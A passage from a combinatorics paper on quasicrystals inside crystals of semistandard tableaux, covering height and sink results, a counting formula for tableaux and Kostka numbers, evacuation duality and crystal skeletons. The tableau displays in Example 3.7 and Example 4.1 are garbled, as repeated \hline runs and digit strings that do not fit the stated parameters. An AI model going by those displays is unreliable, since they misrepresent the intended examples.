\(B(m)_{n-s+1}\) by the corresponding tableaux according to the above bijection. Then the first tableau has weight and minimal parsing of type \(\alpha\), i.e. if indexing the integers by their position in the sequence, we get \[1\leq 1_{1}\leq\ldots\leq 1_{j_{1}}<2_{j_{1}+1}\leq\ldots\leq 2_{j_{2}}<3_{j_{ 2}+1}\leq\ldots\leq k_{j_{k}}<(k+1)_{j_{k}+1}\leq\ldots\leq s_{m}\leq n.\] Since the indices \(i_{j}\) correspond to entries in a tableau, we can consider how crystal operators act on such entries. We are restricting ourselves to crystal operators which preserve the parsing, so they may only be applied to the indices \(i_{j}\) if the weak order described above is preserved. In particular, the crystal operators which may be applied on the sequence, without breaking its weak order, are \(f_{i_{j_{k}+\ell}+k}\) if \(f_{i_{j_{k}+\ell}}\) can be applied to the corresponding tableau in \(B(m)_{n-s+1}\). Then the structure of the quasicrystal \(B(\alpha)\) will be exactly that of \(B(m)_{n-s+1}\), with some relabelled oriented edges. Finally, this is independent of \(\lambda\), since only the weakly increasing sequence is important in the above isomorphism. \(\blacksquare\) **Corollary 3.1 :** Let \(n,m\in\mathbb{N}\) be fixed, and consider any composition \(\alpha\) of \(m\) in \(s\leq n\) parts. Then the number of monic monomials in \(F_{\alpha}(x_{1},\ldots,x_{n})\) is equal to the number of monic monomials in \(F_{(m)}(x_{1},\ldots,x_{n-s+1})\). **Corollary 3.2 :** For \(n\) fixed, and a fixed composition \(\alpha\), all subcomponents \(B(T_{\alpha})_{n}\) are isomorphic as labelled oriented graphs, no matter the crystal \(B(\lambda)_{n}\) they live in. _Proof._ We have seen that \(B(\alpha)\) is isomorphic to \(B(m)_{n-s+1}\), where \(n\) is the fixed maximal entry in the tableaux of \(B(\alpha)\), \(m=|\alpha|\) and \(s=\ell(\alpha)\). Moreover, the isomorphism seen in the proof above does not depend on the shape \(\lambda\) of tableaux, and the modifications of the labels only depend on \(\alpha\). Therefore, a crystal operator can be applied on all tableaux in a given position in different \(B(\alpha)\)'s, no matter their shapes. \(\blacksquare\) In other words, it is justified to study graphs (or quasicrystals) associated to quasisymmetric functions \(F_{\alpha}\), as their oriented graph structure is determined for any fixed \(n\). We could also use a notation \(B(m,n,s)\) as only these values are important in defining the oriented graph structure: relabellings of crystals \(B(m)\) with maximal entry \(n-s+1\). In particular, all \(B(\alpha)_{n}\) for any composition of \(m\) in \(s\leq n\) parts will have the same oriented graph structure: that of \(B(m)_{n-s+1}\). **Remark 3.3 :** We can consider how the crystal operators will act on such weakly increasing sequences. For one thing, a crystal operator \(f_{i}\) will act on the rightmost \(i\) in the sequence, as long as it does not break the increasing sequences: the entries \(i\) can only appear in one horizontal band at the time, in order to preserve the strict increasingness of the sequence, and the rightmost will correspond to the \(NE\) most entry \(i\) in the tableau. This agrees with the parenthesis rule. ### Height of quasicrystals, sources and sinks **Corollary 3.4 :** The quasicrystals \(B(\alpha)_{n}\) have height, or length of their maximal subchain, \(m\cdot(n-s)+1\), where \(n\) is the fixed maximal entry, \(s=\ell(\alpha)\) and \(|\alpha|=m\). _Proof._ The subcomponents \(B(T_{\alpha})\) in any crystal \(B(\lambda)\) contain the chain of tableaux with transformations given by \((f_{n-s}^{\alpha_{1}}\circ\ldots\circ f_{2}^{\alpha_{1}}\circ f_{1}^{\alpha_{ 1}})\circ\ldots\circ(f_{n-2}^{\alpha_{s-1}}\circ\ldots\circ f_{s}^{\alpha_{s- 1}}\circ f_{s-1}^{\alpha_{s-1}})\circ(f_{n-1}^{\alpha_{s}}\circ\ldots\circ f_ {s+1}^{\alpha_{s}}\circ f_{s}^{\alpha_{s}})\), which modifies maximally one horizontal band at a time, from its head to its tail: all entries \(s\) are changed to \(s+1\)'s, then into \(s+2\)'s, etc. until they are all changed into \(n\)'s. Then all entries \(s-1\) are changed into \(s\)'s, then into \(S+1\)'s, etc. until they have all been changed into \(n-1\)'s. This process is continued until all entries \(1\) have been changed into \(n-s\)'s and no more transformations can be applied without modifying the minimal parsing into horizontal bands. This sequence of transformations preserves the parsing into horizontal bands, so we remain always in the same subcomponent \(B(T_{\alpha})\). Moreover, no crystal operator can be applied to the final tableau of the chain without coming out of the subcomponent. We have then obtained, and described, the sink of the subcomponent \(B(T_{\alpha})\): preserving the same minimal parsing as the source, entries \(i\) are replaced by \(n-s+i\). This tableau has weight \((0^{n-s},\alpha)\). There are \(|\alpha|\cdot(n-s)\) crystal operators in this sequence of transformations, and it describes a chain of length \(|\alpha|\cdot(n-s)+1\) in any subcomponent \(B(T_{\alpha})_{n}\), when adding the source to which the crystal operators are applied. Since the chain starts from the source and ends at the sink, it is maximal, since \(f_{i}\) has a unique image going down each row of \(B(\lambda)\). Then, any maximal chain in a quasicrystal \(B(\alpha)\) will have the same length: \(|\alpha|\cdot(n-s)+1\). Since the oriented graph structure of \(B(\alpha)\) is only determined by \(n,m=|\alpha|\) and \(s\), then the height \(|\alpha|\cdot(n-s)+1=m\cdot(n-s)+1\), also only depends on \(n,m,s\). \(\blacksquare\) **Corollary 3.5 :** The sink of a subcomponent \(B(T_{\alpha})\) is obtained from its source \(T_{\alpha}\) by replacing entries \(i\) by \(n-s+i\), where \(s\) is the length of \(\alpha\). ### Number of semistandard tableaux of shape \(\lambda\) and maximal entry \(n\), and Kostka numbers Using the results above, we give a formula for computing the number of tableaux of a given shape \(\lambda\) and maximal possible entry \(n\). In other words, we count the number of tableaux in \(B(\lambda)_{n}\), which is equal to the number of monic monomials in \(s_{\lambda}(x_{1},x_{2},\ldots,x_{n})\). We have seen that \(s_{\lambda}=\sum_{T\in SYT(\lambda)}F_{DesComp(T)}\), and that each quasisymmetric function \(F(\alpha)\) corresponds to a subcomponent \(B(T_{\alpha})\) in the crystal \(B(\lambda)_{n}\), whose vertices are all tableaux of shape \(\lambda\) and maximal entry \(n\). The number of standard tableaux of shape \(\lambda\) is well known to be given by the hook-length formula, and are generally not too hard to enumerate. We have seen that all \(B(\alpha)_{n}\) for compositions \(\alpha\) of \(m\) with the same number \(s\leq n\) of parts are isomorphic to \(B(m)_{n-s+1}\), and that these subcomponents of \(B(\lambda)_{n}\) are counted by the number of standard tableaux with \(d=s-1\) descents. It would then suffice to have formulas for the number of tableaux in \(B(m)_{n-d}\) and for the number of standard tableaux of shape \(\lambda\) with \(d\) descent to give a formula for the number of semistandard tableaux of shape \(\lambda\). Using the results above allows us to do this. **Proposition 3.6 :** The number of tableaux in \(B(m)_{k}\) is equal to the multiset coefficient and binomial coefficient below. \[\left(\left(\begin{array}{c}m+1\\ k-1\end{array}\right)\right)=\left(\begin{array}{c}m+k-1\\ k-1\end{array}\right)=\frac{(m+1)\cdot(m+2)\cdot\ldots\cdot(m+k-1)}{(k-1)!}.\] _Proof._ For all tableaux of shape \((m)\), one must chose the position after which the array holds no more 1's, then the position after which the array holds no more 1's and 2's, etc. up to the end of the array, which is filled with \(k\)'s after the \(k-1^{\rm th}\) position. We want to allow repetitions of chosen positions, since we want to allow that an entry does not appear and is "sandwiched out". We also want to allow the tableau with only 1's, which is the source of \(B(m)_{k}\), so we add 1 position which lies outside of the array. Then if this outside position is picked \(j\) times, for \(1\leq j\leq k-1\), the entries \(k-j+1\) to \(k\) will not appear in the array. Therefore, one chooses \(k-1\) positions in the \(m+1\) possible ones for the breaks between integers, allowing for repetitions, and without keeping track of the order in which the positions are picked. This gives precisely the multiset coefficient above. **Example 3.7 :** The arrays below have their corresponding multiset of positions of breaks noted under them, for \(m=10\) and maximal entry \(k=5\). \[\frac{\framebox{111111111113313}}{\{8,8,11,11\}}\ \ \frac{\framebox{12 222244444}}{\{2,7,7,11\}}\ \ \frac{\framebox{515515151515151515}}{\{1,1,1,1\}}\] **Corollary 3.8 :** The number of tableaux with maximal entry \(n\) in a quasicrystal \(B(\alpha)_{n}\), for any composition \(\alpha\) of \(m\) in \(s\) parts, is given by \[\left(\left(\begin{array}{c}m+1\\ n-s\end{array}\right)\right)=\left(\begin{array}{c}m+n-s\\ n-s\end{array}\right)=\frac{(m+1)\cdot(m+2)\cdot\ldots\cdot(m+n-s)}{(n-s)!}.\] **Corollary 3.9 :** For any composition \(\alpha\vDash m\) in \(s\) parts, the number of monic monomials in \(F_{\alpha}(x_{1},\ldots,x_{n})\) is equal to the binomial coefficient above. **Theorem 3 :** The number of tableaux of shape \(\lambda\) with maximal entry \(n\) is given by \[|SSYT(\lambda)_{n}|=\sum_{0\leq d\leq D}f_{d}^{\lambda}\cdot\left(\begin{array} []{c}|\lambda|+n-d-1\\ n-d-1\end{array}\right),\] where \(f_{d}^{\lambda}\) denotes the number of standard tableaux of shape \(\lambda\) with \(d\) descents, and \(D\) is the maximal number of descents in a standard tableau of shape \(\lambda\). **Example 3.10 :** There are 14 standard tableaux of shape \((4,3)\), which all appear in figure 3. Among these, two have one descents, eight have two and four have three. Then the number of tableaux of shape \((4,3)\) with maximal entry \(n\), for any \(n\), is equal to \[|SSYT((4,3))_{n}|=2\cdot\left(\begin{array}{c}7+n-1-1\\ n-1-1\end{array}\right)+8\cdot\left(\begin{array}{c}7+n-2-1\\ n-2-1\end{array}\right)+4\cdot\left(\begin{array}{c}7+n-3-1\\ n-3-1\end{array}\right)\!.\] One may verify that when \(n=4\), one retrieves 140 tableaux, the number of tableaux in figure 2. The following values for \(n=5,6,7\) (for the same shape \((4,3)\)) are respectively \(560,1764\) and \(4704\) tableaux, which shows how fast these numbers grow. This formula can then really help to enumerate tableaux of a given shape, especially when \(n\) is large. Proof of theorem 3.: Recall that a tableau with \(d\) descents will have an associated descent composition in \(s=d+1\) parts. Let then \(D\) be the maximal number of descents in standard tableaux of shape \(\lambda\), and let \(S\) be the maximal number of parts of the associated descent compositions. When \(n=D+1=S\), all connected components are present in \(B(\lambda)_{n}\). All those associated to a descent composition \(\alpha\) in \(s=d+1\) parts is isomorphic to a crystal \(B(m)_{k}\), which number of vertices is the multiset coefficients above, where \(k=n-s+1=n-d\) and \(m=|\lambda|=|\alpha|\). The quasicrystals in \(B(\lambda)_{n}\) are disjoint, and are counted by the standard tableaux of shape \(\lambda\). Therefore we have the formula above. Moreover, this formula accounts for the cases where \(n<D+1=S\), since the terms of the summation with \(n<d+1\leq D+1\) will be zero. **Corollary 3.11 :** For a partition \(\lambda\vDash m\), the number of monic monomials in \(s_{\lambda}(x_{1},\ldots,x_{n})\) is equal to the sum above. Although very interesting, the formula above for the number of tableaux of shpe \(\lambda\) and maximal entry \(n\) does not solve the much more interesting problem of giving a (closed) formula for Kostka numbers \(K_{\mu}^{\lambda}\), a problem highlighted by Stanley ([Stanley, 2012], Vol.2, section 7.10). Recall that these \(K_{\mu}^{\lambda}\) count the number of tableaux of shape \(\lambda\vdash m\) and filling \(\mu\) (a fixed composition of \(m\)). There is however a combinatorial formula, given below, for which only a bijective proof is known. The setting of quasicrystals allowes us to give a constructive combinatorial proof, which we discuss below. **Proposition 3.12 ([Sagan, 2001, Proposition 5.3.6]) :** Let \(\lambda\vdash n\), \(S=\{n_{1}<n_{2}<\ldots<n_{k}\}\subseteq[n-1]\), and \(\mu=(n_{1},n_{2}-n_{1},\ldots,n-n_{k})\). Then \[|\{P:P\mbox{ a standard $\lambda$-tableau and }Des(P)\subseteq S\}|=K_{\mu}^{\lambda}.\] **Proposition 3.13**: **:** A given weight \(\mu\) appears exactly once in a quasicrystal \(B(\alpha)\), and if and only if \(\alpha\preccurlyeq\mu\). _Proof._ We have seen that all weights \(\alpha\preccurlyeq\mu\) in at most \(n\) parts occur in \(B(\alpha)_{n}\), and only such weights appear in \(B(\alpha)_{n}\). Moreover, for a given minimal parsing of type \(\alpha\) of a given shape \(\lambda\), \(\alpha\preccurlyeq\mu\) defines uniquely a tableau of shape \(\lambda\) in the corresponding subcomponent \(B(T_{\alpha})_{n}\) in \(B(\lambda)_{n}\), where \(T_{\alpha}\) has the desired minimal parsing. Therefore, in any subcomponent \(B(T_{\alpha})_{n}\), there is exactly one tableau of the desired weight \(\mu\) in at most \(n\) parts. \(\blacksquare\) By the above, each subcomponent \(B(T_{\alpha})\) in \(B(\lambda)\) with \(\alpha\preccurlyeq\mu\) will contain exactly one tableau of filling \(\mu\). This gives us the following reinterpretation of Proposition 3.12, with a constructive proof. **Corollary 3.14**: **:** The Kostka number \(K_{\mu}^{\lambda}\) counting tableaux of shape \(\lambda\) and composition weight \(\mu\) is given by the number of subcomponents \(B(T_{\alpha})\) of \(B(\lambda)\) such that \(\alpha\preccurlyeq\mu\), and this number is given by the number of standard tableaux with descent composition \(\alpha\) with \(\alpha\preccurlyeq\mu\). So \[K_{\mu}^{\lambda}=\left|\{T\in SYT(\lambda):DesComp(T)\preccurlyeq\mu\} \right|.\] ## 4 Layout of subcomponents \(B(T_{\alpha})\) in a crystal \(B(\lambda)\) From the previous sections, we have a decomposition of \(B(\lambda)\) into a disjoint union of induced subgraphs \(B(T_{\alpha})\) corresponding to the \(F_{\alpha}\) appearing in the expansion of \(s_{\lambda}\) in the basis of fundamental quasisymmetric functions. Each of these subcomponents regroup tableaux with a specific minimal parsing of type \(\alpha\) and correspond to the standard tableau of shape \(\lambda\) with the same minimal parsing. In this section, we study how a crystal \(B(\lambda)\) breaks down into these subcomponents, by looking at how they are positioned relatively to one another. In order to understand better their distribution, we need to introduce the evacuation involution EVAC on tableaux, as we'll show it is a crystal anti-automorphism on \(B(\lambda)_{n}\) which reverses descent compositions and respects the above decomposition. The evacuation map then sets up a duality between subcomponents associated to descent compositions \(\alpha=(\alpha_{1},\ldots,\alpha_{s})\) and those associated to its reverse composition \(\overleftarrow{\alpha}=(\alpha_{s},\ldots,\alpha_{1})\). The dual subcomponents will appear in dual position in \(B(\lambda)\), and will be dual to one to another as graphs. We also study the (fixed) skeleton structure of \(B(\lambda)\) obtained by replacing each subcomponent by the associated standard tableau, and compare this underlying graph structure on standard tableaux with the one of dual equivalence graphs, introduced by Assaf [Assaf, 2015]. ### Evacuation as a crystal anti-automorphism The evacuation involution was first introduced by Schutzenberger as an involution on tableaux of the same shape \(\lambda\)[Schutzenberger, 1963]. Berenstein and Zelevinsky showed that the effect of evacuation can be described in the following way [Berenstein and Zelevinsky, 1996]. Let \(T\) be a tableau of any shape. Rotate \(T\)\(180^{\circ}\), change entries \(i\) to \(n-i+1\), where \(n\) is the largest entry in \(T\), and rectify this skew tableau using jeu de taquin (see section 5 for a recall of the proces of rectifications). We shall use this result as the definition of evacuation: \(\mbox{EVAC}=jdt\circ\mbox{compl}\circ Rot_{180^{\circ}}\), where \(Rot_{180^{\circ}}\), compl and \(jdt\) are the three intermediate manipulations described above. The obtained tableau EVAC(\(T\)) has the same shape as \(T\), and applying EVAC to it recovers \(T\)[Berenstein and Zelevinsky, 1996]. **Example 4.1 :** For the straight tableau \(T=\)\(jdt\circ\mbox{compl}\circ Rot_{180^{\circ}}\left(T\right)=jdt\circ\mbox{ compl}\left(\begin{array}{c|c}\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\end{array}\right)=jdt\left( \begin{array}{c|c}\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\end{array}\right)= \frac{1}{2}\left[\begin{array}{c|c}\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\end{array}\right)=\frac{1}{2}\left[\begin{array}{c|c}\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\end{array}\right]=\mbox{EVAC}\left(T\right)\). One may verify that repeating this process on EVAC(\(T\)) recovers \(T\). Berenstein and Zelevinsky showed that EVAC is an anti-automorphism on crystals \(B(\lambda)_{n}\)[Berenstein and Zelevinsky, 1996]. This means that if a tableau \(T\) is obtained from the source \(1_{\lambda}\) of the crystal by a sequence of crystal operators \(T=f_{i_{k}}\circ f_{i_{k-1}}\circ\ldots\circ f_{i_{2}}\circ f_{i_{1}}(1_{ \lambda})\), then EVAC(\(T\)) = \(e_{n-i_{k}}\circ e_{n-i_{k-1}}\circ\ldots\circ e_{n-i_{2}}\circ e_{n-i_{1}}(T _{min})\), where \(T_{min}\) is the sink of the crystal, which would then be EVAC(\(1_{\lambda}\)). The original proof of Berenstein and Zelevinsky uses crystal theory and representation theory heavily, so we give an alternate proof of this fact in annex A, which may be more accessible. We also believe our proof to be of interest on its own, as it uses an anti-automorphism of crystals on words, defined by \(Rot(w)=w_{0}ww_{0}\), which has been already studied in the literature. We also give a proof that EVAC reverses descent compositions. ### Double duality of subcomponents \(B(T_{\alpha})\) and \(B(T_{\alpha})\) in \(B(\lambda)\) There are two notions of duality at play in this section. The notion of duality which comes from graph (or poset) theory, where the dual of a labelled oriented graph is the graph obtained by reversing arrows, relabelling by \(n-i+1\), and replacing each vertex by its \({}^{*}\)dual image\({}^{*}\). There is also the notion of duality coming from the involution EVAC, where EVAC(\(A\)) is dual to \(A\) for a set of tableaux \(A\). In the case of the subcomponents of a crystal \(B(\lambda)_{n}\), we will see that these two notions of duality coincide, as evacuation sets up a duality between the subcomponents. For each subcomponent \(B(T_{\alpha})\), there will be a subcomponent \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\) such that they are the reciprocal image under the EVAC map and are the dual graphs of one another, where the dual image of each vertex is precisely its image under the EVAC map. We also say they are placed dually in \(B(\lambda)_{n}\), since EVAC is an anti-automorphism of crystals on \(B(\lambda)_{n}\). It then gives us the following results on the subcomponents of \(B(\lambda)\) associated to the fundamental quasisymmetric functions \(F_{\alpha}\). **Theorem 4 :** Subcomponents \(B(T_{\alpha})\) and \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\) both necessarily appear in a given crystal \(B(\lambda)\), they are dual to each other and are positioned in dual locations in \(B(\lambda)\). The crystal anti-automorphism between them is the evacuation map EVAC. _Proof._ We have seen that the source of a subcomponent \(B(T_{\alpha})\) is the tableau \(T_{\alpha}\) of shape \(\lambda\), with filling and descent composition \(\alpha\). Consider a set \(A\) of tableaux in \(B(T_{\alpha})\). Since EVAC reverses descent compositions, then EVAC\((A)\) will be a set of tableaux with descent composition \(\stackrel{{\leftarrow}}{{\alpha}}\). Moreover, since it is also a crystal anti-automorphism, if a tableau \(T\in A\) is obtained from \(T_{\alpha}\) by a sequence of crystal operators \(f_{i}\) which preserve descent compositions, then EVAC\((T)\) is obtained from EVAC\((T_{\alpha})\) by the complementary sequence of crystal operators \(e_{n-i}\), and so the set EVAC\((A)\) is connected and regroups tableaux with same descent composition \(\stackrel{{\leftarrow}}{{\alpha}}\). This is because the \(f_{i}\)'s modify the weight by \(b_{i+1}-b_{i}\), and the \(e_{i}\)'s, by \(-b_{i+1}+b_{i}\), so the effect of \(f_{i}\) on a weight \(\gamma\) will be dual to that of \(e_{n-i}\) on \(\stackrel{{\leftarrow}}{{\gamma}}\). Then, subcomponents \(B(T_{\alpha})\) are mapped onto subcomponents \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\), and they are dual to each other as graphs, with the dual image of each vertex given by their image under EVAC. Finally, by the previous argument, we also have that the two subcomponents are positionned dually in \(B(\lambda)\): if a sequence of crystal operators \(f_{i_{k}}\circ\ldots\circ f_{i_{1}}\), applied to the source \(1_{\lambda}\) of \(B(\lambda)_{n}\), gives a vertex of \(B(T_{\alpha})\), then the "dual" sequence \(e_{n-i_{k}+1}\circ\ldots\circ e_{n-i_{1}+1}\), applied to the sink EVAC\((1_{\lambda})\) of \(B(\lambda)_{n}\), gives its dual image in \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\), EVAC\((T_{\alpha})\). \(\blacksquare\) This tells us that the evacuation map respects intrinsically the decomposition of \(B(\lambda)\) into its subcomponents \(B(T_{\alpha})\). **Corollary 4.2 :** The source \(T_{\alpha}\) of a subcomponent \(B(T_{\alpha})\) is sent by EVAC on the sink of the corresponding dual subcomponent \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\), and conversely. **Example 4.3 :** Figure 2 illustrates the duality (and symmetry) of the positioning of the subcomponents \(B(T_{\alpha})\) and \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\). Note how the two subcomponents associated to \((2,3,2)\) are dual, and start and end on the same rows of the crystal. **Proposition 4.4 :** The quasicrystals \(B(\alpha)\) are self-dual as labelled oriented graphs when \(\alpha\) is symmetric, i.e. \(\alpha=\overleftarrow{\alpha}\). **Remark 4.5 :** This self-duality holds on the structure of quasicrystals \(B(\alpha)\) (as graphs). However, the subcomponents \(B(T_{\alpha})\) are not necessarily sent onto themself under the EVAC map, as illustrated in example 4.3. _Proof of Proposition 4.4._ EVAC is an anti-automorphism which sends one subcomponent \(B(T_{\alpha})\) onto a subcomponent \(B(T_{\alpha}^{-})=B(T_{\alpha}^{\prime})\). Since both subcomponents are then isomorphic and dual, and all subcomponents in \(B(\alpha)\) are isomorphic, then \(B(\alpha)\) is auto-dual as a labelled oriented graph when \(\alpha=\overleftarrow{\alpha}\). \(\blacksquare\) **Corollary 4.6 :** For a fixed composition \(\alpha\), all subcomponents \(B(T_{\alpha})\) have their source on the same row \(j+1\) of \(B(\lambda)\), where \(j\) is the number of transformations \(+(b_{i+1}-b_{i})=+(0,\ldots,0,-1,1,0,\ldots,0)\) applied to \(\lambda\) to obtain \(\alpha\), or equivalently the number \(j\) of crystal operators \(f_{i}\) applied to \(1_{\lambda}\) to obtain \(T_{\alpha}\). _Proof._ We have seen that the crystal operators \(f_{i}\) have effect \(+(b_{i}-b_{i-1})\) on the weight of tableaux. Then row \(j+1\) of \(B(\lambda)\) holds all tableaux obtained from \(1_{\lambda}\) by applying \(j\) crystal operators \(f_{i}\). If a certain sequence of crystal operators \(f_{i_{1}},f_{i_{2}},\ldots,f_{i_{j}}\) modify \(\lambda\) to obtain \(\alpha\), then all tableaux of weight \(\alpha\) are obtained by the application of a certain reordering of these crystal operators. Then, all tableaux of weight \(\alpha\) will be on the same row \(j+1\). Among these, all tableaux with weight and minimal parsing of type \(\alpha\) lie on this row \(j+1\) of \(B(\lambda)\). Since these are the sources of the subcomponents of \(B(\alpha)\), then we have the desired result. \(\blacksquare\) **Remark 4.7 :** In a crystal \(B(\lambda)\), all descent compositions \(\alpha\) occur as weights of tableaux, and are therefore obtained from \(\lambda\) by applying modifications \(b_{i+1}-b_{i}\), from \(\lambda\) to \(\overleftarrow{\lambda}\). Moreover, all the descent compositions \(\alpha\) are not refinements of another and do not include zero parts (by their definition as counting lengths of horizontal bands in minimal parsings). ### Crystal skeleton If we replace every subcomponent of \(B(\lambda)_{n}\) by the associated standard tableaux of shape \(\lambda\), and keep only one oriented edge between linked subcomponents, with one copy of all labels appearing at least once, one gets a labelled oriented graph on standard tableaux. Note that this can create cycles. We will see that we can restrict this further by keeping only the minimal label on each oriented edge. We call the result the skeleton of \(B(\lambda)_{n}\). This notion of skeleton is especially interesting, because it gives a compact visual representation of \(B(\lambda)_{n}\) for any \(n\), and also of \(B(\lambda)\), as we will see. Doing this to figure 2, one gets the labelled oriented graph on standard tableaux of shape \((4,3)\) of figure 3. Since we know the oriented graph structure of these subcomponents by corollary 3.2, these can be expanded to essentially retreive the full graph, with some edges missing between subcomponents. Note the symmetry coming from the auto-duality of \(B(\lambda)\). The obtained labelled oriented graph on standard tableaux does not have a crystal structure, in particular because a standard tableau can have two distinct images for the same transformations. For example, in figure 3, the top standard tableau (sometimes refered to as the _superstandard tableau_) has three distinct images under the transformations \(1\). We will see in the proposition below that we are justified in keeping only the minimal label of oriented edges between subcomponents. **Proposition 4.8 :** Let \(n\) and \(\lambda=(\lambda_{1},\lambda_{2},\ldots,\lambda_{\ell})\) be fixed. Let \(std(T_{\alpha})\) and \(std(T_{\beta})\) be standard tableaux of shape \(\lambda\), and of respective descent compositions \(\alpha=(\alpha_{1},\ldots,\alpha_{k})\) and \(\beta=(\beta_{1},\ldots,\beta_{s})\). Let \(i\) be the smallest index such that a crystal operator \(f_{i}\) allows one to pass between the associated subcomponents \(B(T_{\alpha})\) and \(B(T_{\beta})\) in \(B(\lambda)_{n}\), for \(1\leq i\leq n-1\). Then the crystal operators \(f_{i+1},\ldots,f_{i+(n-s)}\) do too. Proof.: Crystal operators act on weights \(\gamma\) of tableaux in \(B(\lambda)_{n}\). If a tableau \(T\) lies in \(B(T_{\alpha})\), it has also \(\alpha\preccurlyeq wt(T)=\gamma\). If \(f_{i}(T)\) lies in \(B(T_{\beta})\), then it means that \(\beta\preccurlyeq wt(f_{i}(T))=\gamma+(b_{i+1}-b_{i})\). This will also be the case for \((0^{k},\gamma)\), for \(0\leq k\leq n-s\), with the crystal Figure 3: Skeleton of \(B(4,3)_{4}\), where subcomponents are replaced by their associated standard tableau. Labeled oriented edges \(i\) indicate that transformations \(f_{i}\) move from one subcomponent to another, and \(i\) is minimal (by definition). Labels are colored according to the origin subcomponent for clarity. The vertical position of a vertex is determined by the row of the source of the associated connected component in \(B(4,3)_{4}\), and alternatively also segregates standard tableaux by their number of descents. operator having the corresponding actions on the weights being \(f_{i+k}\). This means we can keep only the smallest label \(i\) of oriented edges between subcomponents. We then call the obtained skeleton \(Skeleton(\lambda)_{n}\). **Theorem 5 :** For \(\lambda\vdash m\) fixed, and let \(S\) be the maximal length of descent compositions for \(\lambda\). Then the skeletons \(Skeleton(\lambda)_{n}\) of the crystals \(B(\lambda)_{n}\) are equal for all \(n\geq S\). For \(1\leq n\leq S\), the skeleton of \(B(\lambda)_{n}\) consists of the induced subgraph of \(Skeleton(\lambda)_{S}\) containing standard tableaux of shape \(\lambda\) with descent compositions in at most \(n\) parts. Proof.: Let's first consider two random subcomponents \(B(T_{\alpha})\), \(B(T_{\beta})\), for \(T_{\alpha},T_{\beta}\) of the same shape \(\lambda\), with respective weight and minimal parsing of type \(\alpha\) and \(\beta\), for incomparable descent compositions \(\alpha,\beta\). Both subcomponents occur in all \(B(\lambda)_{n}\) for \(n\geq N=\max(\ell(\alpha),\ell(\beta))\). Suppose that there exists a minimal value \(k\in\mathbb{N}\) such that there exists an edge labelled \(i\) from \(B(T_{\alpha})\) into \(B(T_{\beta})\) in \(B(\lambda)_{N+k}\). There are then two tableaux \(T_{\gamma^{(1)}}\in B(T_{\alpha})\) and \(T_{\gamma^{(2)}}\in B(T_{\beta})\) such that \(\alpha\preccurlyeq\gamma^{(1)}\), \(\beta\preccurlyeq\gamma^{(2)}\) and \(f_{i}(T_{\gamma^{(1)}})=T_{\gamma^{(2)}}\). We then have \[\alpha\preccurlyeq\gamma^{(1)}=(\gamma_{1},\gamma_{2},\ldots, \gamma_{i-1},\gamma_{i},\gamma_{i+1},\gamma_{i+1},\ldots,\gamma_{N+k})\] \[\beta\preccurlyeq\gamma^{(2)}=(\gamma_{1},\gamma_{2},\ldots, \gamma_{i-1},\gamma_{i}-1,\gamma_{i+1}+1,\gamma_{i+1},\ldots,\gamma_{N+k}).\] The crystal operator \(f_{i}\) changes exactly one entry \(i\) into an entry \(i+1\) in \(T_{\gamma^{(1)}}\), but changes the minimal parsing. Therefore, it must act exactly on two maximal horizontal bands of \(T_{\gamma^{(1)}}\), modifying the maximal horizontal band containing that entry \(i\) and the one containing \((i+1)\)'s in \(T_{\gamma^{(1)}}\). Moreover, the entries \(i\) and \(i+1\) cannot be part of the same maximal horizontal band, otherwise the minimal parsing would not be changed. Recall that we can express a decomposition of \(\gamma^{(1)}\) and \(\gamma^{(2)}\) into subsets of parts, respectively summing to the parts of \(\alpha\) and \(\beta\), to represent the minimal parsing respectively of \(T_{\gamma^{(1)}}\) and \(T_{\gamma^{(2)}}\). Since they differ in exactly two maximal horizontal bands, then the decompositions of \(\gamma^{(1)}\) and \(\gamma^{(2)}\) have all subsets equal, except for those containing the \(i^{\text{th}}\) and \((i+1)^{\text{th}}\) parts. Suppose then that \(j_{1}<j_{2}<\ldots\) give the position of the last part of each subset, this gives the following decompositions, with potentially an added separation \(|\) before the \(i^{\text{th}}\) part and/or after the \((i+1)^{\text{th}}\) part, in \(\gamma^{(1)}\) and/or \(\gamma^{(2)}\). \[\begin{array}{c}\alpha\preccurlyeq\gamma^{(1)}=(\gamma_{1},\ldots,\gamma_{ j_{1}}|\gamma_{j_{1}+1},\ldots,\gamma_{j_{2}}|\ldots|\gamma_{j_{\ell+1}},\ldots, \gamma_{i}|\gamma_{i+1},\ldots,\gamma_{\ell+1}|\ldots,\gamma_{N+k})\\ \beta\preccurlyeq\gamma^{(2)}=(\gamma_{1},\ldots,\gamma_{j_{1}}|\gamma_{j_{1 }+1},\ldots,\gamma_{j_{2}}|\ldots|\gamma_{j_{\ell+1}},\ldots,\gamma_{i}-1| \gamma_{i+1}+1,\ldots,\gamma_{\ell+1}|\ldots,\gamma_{N+k}).\end{array}\] Now, since \(k\) is minimal by hypothesis, then there cannot be equal subsets with more than one part, because otherwise there exists two tableaux \(T_{\gamma^{(1)^{\prime}}},T_{\gamma^{(2)^{\prime}}}\) respectively in \(B(T_{\alpha})\) and \(B(T_{\beta})\) which have weights of smaller length that \(N+k\) obtained by summing parts of equal subsets, with \(T_{\gamma^{(1)^{\prime}}}\xrightarrow{j}T_{\gamma^{(2)^{\prime}}}\) in \(B(\lambda)_{n}\) for \(n<N+k\) and \(j\leq i\). For the same reason, there cannot be more than two parts in the subsets containing the \(i^{\rm th}\) and \((i+1)^{\rm th}\) parts in \(\gamma^{(1)}\) and \(\gamma^{(2)}\). We then have that the decomposition above is coarser, with again potentially an 